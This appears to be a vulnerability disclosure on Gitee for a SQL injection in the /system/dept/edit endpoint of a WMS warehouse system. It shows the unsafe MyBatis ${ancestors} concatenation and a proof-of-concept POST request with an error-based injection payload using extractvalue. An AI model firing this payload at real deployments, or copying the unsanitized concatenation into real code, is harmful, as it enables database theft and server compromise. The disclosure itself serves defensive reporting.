SQL injection vulnerability on /system/dept/edit

# Summary

In the latest version, a parameter passed to the endpoint `/system/dept/edit` are user-controllable and not sanitized, and no prepared statements are used when executing the final SQL query, resulting in a SQL injection vulnerability. Attackers can exploit this vulnerability to obtain sensitive data from the database and even gain complete control of the server.

---

# Details

### taint analysis:

- src/main/resources/mapper/system/SysDeptMapper.xml
```
<update id="updateDeptStatus" parameterType="SysDept">
        update sys_dept
        <set>
            <if test="status != null and status != ''">status = #{status},</if>
            <if test="updateBy != null and updateBy != ''">update_by = #{updateBy},</if>
            update_time = sysdate()
       </set>
        where dept_id in (${ancestors})
</update>
```

```
@Log(title = "部门管理", businessType = BusinessType.UPDATE)
@RequiresPermissions("system:dept:edit")
@PostMapping("/edit")
@ResponseBody
public AjaxResult editSave(SysDept dept)
{
    dept.setUpdateBy(ShiroUtils.getLoginName());
    return toAjax(deptService.updateDept(dept));
}
```

---

# POC
```
POST /system/dept/edit HTTP/1.1
Host: 127.0.0.1:7001
Cookie: JSESSIONID=5ffda3ab-8334-4505-8dc6-ed991f34df48
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Connection: close

DeptName=xxxxxxxxxxx&DeptId=100&ParentId=555&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat(0,(select user()))));#

```
![输入图片说明](https://foruda.gitee.com/images/1752228262719834692/26e36521_8279293.png "屏幕截图")---

# Impact
https://portswigger.net/web-security/sql-injection#what-is-the-impact-of-a-successful-sql-injection-attack

---

wms仓库管理系统/立体仓库WMS

内容风险标识

评论 (0)

wms仓库管理系统/立体仓库WMS .gitee-modal { width: 500px !important; }

内容风险标识